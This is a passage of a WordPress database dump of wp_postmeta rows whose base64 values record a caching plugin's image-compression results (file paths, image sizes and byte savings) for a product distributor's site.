OiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9NUy0xMjJBVi0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6OTE0LCJ0aW1lIjoxNDgzNTYzMTEwLCJpZCI6MTc5Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NUy0xMjJBVi04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01TLTEyMkFWLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvTVMtMTIyQVYtODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjMxNzEsInRpbWUiOjE0ODM1NjMxMTMsImlkIjoxNzk2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01TLTEyMkFWLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTVMtMTIyQVYtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9NUy0xMjJBVi03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6MjgzOCwidGltZSI6MTQ4MzU2MzExNywiaWQiOjE3OTZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTVMtMTIyQVYtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTVMtMTIyQVYtMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL01TLTEyMkFWLTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjEzMzE5LCJ0aW1lIjoxNDgzNTYzMTIxLCJpZCI6MTc5Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NUy0xMjJBVi0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01TLTEyMkFWLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvTVMtMTIyQVYtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjYyMCwidGltZSI6MTQ4MzU2MzEyNCwiaWQiOjE3OTZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTVMtMTIyQVYtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NUy0xMjJBVi0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL01TLTEyMkFWLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo1MDcsInRpbWUiOjE0ODM1NjMxMjcsImlkIjoxNzk2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01TLTEyMkFWLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTVMtMTIyQVYtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9NUy0xMjJBVi0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NjA0LCJ0aW1lIjoxNDgzNTYzMTMxLCJpZCI6MTc5Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NUy0xMjJBVi01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01TLTEyMkFWLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvTVMtMTIyQVYtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjE4ODMsInRpbWUiOjE0ODM1NjMxMzQsImlkIjoxNzk2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTVMtMTIyQVYtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NUy0xMjJBVi0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL01TLTEyMkFWLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjo0MTksInRpbWUiOjE0ODM1NjMxMzcsImlkIjoxNzk2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTVMtMTIyQVYtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NUy0xMjJBVi0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL01TLTEyMkFWLTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjo2MzEsInRpbWUiOjE0ODM1NjMxNDEsImlkIjoxNzk2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTVMtMTIyQVYtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NUy0xMjJBVi0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL01TLTEyMkFWLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo2ODUsInRpbWUiOjE0ODM1NjMxNDQsImlkIjoxNzk2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvTVMtMTIyQVYtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9NUy0xMjJBVi00NTB4MzAwLmpwZyIsIndpZHRoIjoiNDUwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL01TLTEyMkFWLTQ1MHgzMDAuanBnIiwicmVkdWN0aW9uIjoxMDI2LCJ0aW1lIjoxNDgzNTYzMTQ3LCJpZCI6MTc5Nn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01TLTEyMkFWLTkweDkwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL01TLTEyMkFWLTkweDkwLmpwZyIsIndpZHRoIjoiOTAiLCJoZWlnaHQiOiI5MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9NUy0xMjJBVi05MHg5MC5qcGciLCJyZWR1Y3Rpb24iOjM4NCwidGltZSI6MTQ4MzU2MzE1MSwiaWQiOjE3OTZ9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29168, 1794, 'wpfc_optimisation_reduction', '590'); 
INSERT INTO `wp_postmeta` VALUES (29169, 1794, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWF1dGhvcml6ZWQtZGlzdHJpYnV0b3ItMy1lMTQ3NDI5MTI0NzE1OS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1hdXRob3JpemVkLWRpc3RyaWJ1dG9yLTMtZTE0NzQyOTEyNDcxNTkuanBnIiwid2lkdGgiOjEwMCwiaGVpZ2h0Ijo3OSwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC1hdXRob3JpemVkLWRpc3RyaWJ1dG9yLTMtZTE0NzQyOTEyNDcxNTkuanBnIiwicmVkdWN0aW9uIjo1OTAsInRpbWUiOjE0ODM1NjMxNTcsImlkIjoiMTc5NCJ9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29170, 1793, 'wpfc_optimisation_reduction', '682'); 
INSERT INTO `wp_postmeta` VALUES (29171, 1793, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWF1dGhvcml6ZWQtZGlzdHJpYnV0b3ItMi1lMTQ3NDI5MTAxNzY1My5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1hdXRob3JpemVkLWRpc3RyaWJ1dG9yLTItZTE0NzQyOTEwMTc2NTMuanBnIiwid2lkdGgiOjEyNSwiaGVpZ2h0Ijo5OSwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC1hdXRob3JpemVkLWRpc3RyaWJ1dG9yLTItZTE0NzQyOTEwMTc2NTMuanBnIiwicmVkdWN0aW9uIjo2ODIsInRpbWUiOjE0ODM1NjMxNjIsImlkIjoiMTc5MyJ9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29172, 1792, 'wpfc_optimisation_reduction', '1242'); 
INSERT INTO `wp_postmeta` VALUES (29173, 1792, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWF1dGhvcml6ZWQtZGlzdHJpYnV0b3ItZTE0NzQyOTA2MDg3NjEuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYXV0aG9yaXplZC1kaXN0cmlidXRvci1lMTQ3NDI5MDYwODc2MS5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjE5OCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1hdXRob3JpemVkLWRpc3RyaWJ1dG9yLWUxNDc0MjkwNjA4NzYxLmpwZyIsInJlZHVjdGlvbiI6MTAwNywidGltZSI6MTQ4MzU2MzE2NywiaWQiOiIxNzkyIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYXV0aG9yaXplZC1kaXN0cmlidXRvci1lMTQ3NDI5MDYwODc2MS0yNTB4MTk4LmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MTk4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1hdXRob3JpemVkLWRpc3RyaWJ1dG9yLWUxNDc0MjkwNjA4NzYxLTI1MHgxOTguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWF1dGhvcml6ZWQtZGlzdHJpYnV0b3ItZTE0NzQyOTA2MDg3NjEtMjUweDE5OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjMxNjksImlkIjoxNzkyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1hdXRob3JpemVkLWRpc3RyaWJ1dG9yLWUxNDc0MjkwNjA4NzYxLTIwMHgxOTguanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoxOTgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWF1dGhvcml6ZWQtZGlzdHJpYnV0b3ItZTE0NzQyOTA2MDg3NjEtMjAweDE5OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYXV0aG9yaXplZC1kaXN0cmlidXRvci1lMTQ3NDI5MDYwODc2MS0yMDB4MTk4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2MzE3MiwiaWQiOjE3OTJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWF1dGhvcml6ZWQtZGlzdHJpYnV0b3ItZTE0NzQyOTA2MDg3NjEtMjI1eDE5OC5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjE5OCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYXV0aG9yaXplZC1kaXN0cmlidXRvci1lMTQ3NDI5MDYwODc2MS0yMjV4MTk4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1hdXRob3JpemVkLWRpc3RyaWJ1dG9yLWUxNDc0MjkwNjA4NzYxLTIyNXgxOTguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTYzMTc1LCJpZCI6MTc5Mn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1hdXRob3JpemVkLWRpc3RyaWJ1dG9yLWUxNDc0MjkwNjA4NzYxLTkweDkwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1hdXRob3JpemVkLWRpc3RyaWJ1dG9yLWUxNDc0MjkwNjA4NzYxLTkweDkwLmpwZyIsIndpZHRoIjoiOTAiLCJoZWlnaHQiOiI5MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYXV0aG9yaXplZC1kaXN0cmlidXRvci1lMTQ3NDI5MDYwODc2MS05MHg5MC5qcGciLCJyZWR1Y3Rpb24iOjIzMiwidGltZSI6MTQ4MzU2MzE3NywiaWQiOjE3OTJ9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29174, 1790, 'wpfc_optimisation_reduction', '19017'); 
INSERT INTO `wp_postmeta` VALUES (29175, 1790, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uZS1NdWx0aS11c2UuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb25lLU11bHRpLXVzZS5qcGciLCJ3aWR0aCI6NTE4NCwiaGVpZ2h0IjozNDU2LCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTYzMTgxLCJpZCI6IjE3OTAifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbmUtTXVsdGktdXNlLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uZS1NdWx0aS11c2UtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9UZWZsb25lLU11bHRpLXVzZS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NzUxLCJ0aW1lIjoxNDgzNTYzMTg0LCJpZCI6MTc5MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb25lLU11bHRpLXVzZS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbmUtTXVsdGktdXNlLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uZS1NdWx0aS11c2UtODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjE5MjAsInRpbWUiOjE0ODM1NjMxODgsImlkIjoxNzkwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbmUtTXVsdGktdXNlLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uZS1NdWx0aS11c2UtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9UZWZsb25lLU11bHRpLXVzZS03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6MTc2OCwidGltZSI6MTQ4MzU2MzE5MiwiaWQiOjE3OTB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uZS1NdWx0aS11c2UtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uZS1NdWx0aS11c2UtMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1RlZmxvbmUtTXVsdGktdXNlLTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjgyODQsInRpbWUiOjE0ODM1NjMxOTYsImlkIjoxNzkwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbmUtTXVsdGktdXNlLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uZS1NdWx0aS11c2UtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9UZWZsb25lLU11bHRpLXVzZS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NTA5LCJ0aW1lIjoxNDgzNTYzMTk5LCJpZCI6MTc5MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb25lLU11bHRpLXVzZS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbmUtTXVsdGktdXNlLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoia